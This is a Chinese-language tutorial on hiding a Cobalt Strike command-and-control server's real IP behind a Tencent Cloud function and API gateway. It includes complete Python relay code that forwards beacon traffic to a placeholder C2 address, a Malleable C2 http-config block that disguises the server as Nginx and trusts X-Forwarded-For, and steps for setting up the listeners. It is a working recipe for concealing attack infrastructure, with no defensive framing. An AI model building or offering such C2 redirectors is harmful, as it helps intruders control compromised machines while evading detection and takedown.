攻防之隐匿真实Cobalt Strike IP_卜八电脑最全问题故障中心

云函数隐匿真实IP

本次实验利用的腾*云：(其他也相同)

点击新建云函数，选择创建方式—自定义创建，函数名称自定义或者默认都可以，运行环境选择python3.6，其他版本也行。

1618485794_607822220d09fb54b9630.png!small?1618485794028

云函数代码如下(可先点击完成，后面再补进去)：

# -*- coding: utf8 -*- import json,base64,requests def main_handler(event,context): C2 = 'http://IP:PORT' headers = event['headers'] path = event['path'] ip = event['requestContext']['sourceIp'] headers = event['headers'] headers['X-Forwarded-For'] = ip print(event) if event['httpMethod'] == 'GET': resp = requests.get(C2+path,headers=headers,verify=False) else: resp = requests.post(C2+path,data=event['body'],headers=headers,verify=False) print(resp.headers) print(resp.content) response={ "isBase64Encoded":True, "statusCode":resp.status_code, "headers":dict(resp.headers), "body":str(base64.b64encode(resp.content))[2:-1] } return response

然后创建触发器，具体配置如下图：

使用API网关来进行触发函数。

1618486093_6078234d0f4546169f1ef.png!small?1618486093126

1618486101_60782355ccb6c43b29cc8.png!small?1618486101910

然后配置一下网关API路径：

1618486142_6078237e37fca7ee044bb.png!small?1618486142198

1618486150_6078238604badc653233b.png!small?1618486150015

1618486181_607823a5a83e935d60a4a.png!small?1618486181849

选择立即完成并发布任务即可。

这里配置完成后，我们得到API网关地址如下图：

1618486286_6078240ecae818bdd2828.png!small?1618486286936

记一下该地址，等下需要用到。

接着先去修改profile文件，配置文件http-config设置如下：

http-config { set headers "Server, Content-Type, Cache-Control, Connection, X-Powered-By"; header "Server" "Nginx"; header "Content-Type" "text/html;charset=UTF-8"; header "Cache-Control" "max-age=1"; header "Connection" "keep-alive"; set trust_x_forwarded_for "true"; }

这里是为了与上面的云函数同步使用X-Forward-For来获取真实ip。

然后我们就可以去CS中

创建一个监听器，配置如下图，HTTP Hosts处和 HTTP Host(Stager)处填入刚才获取到的API网关地址(Port 一定要是80)。

如在云函数中指定了port，则需要创建两个监听器。

1618486491_607824dbd8df1d484261b.png!small?1618486491979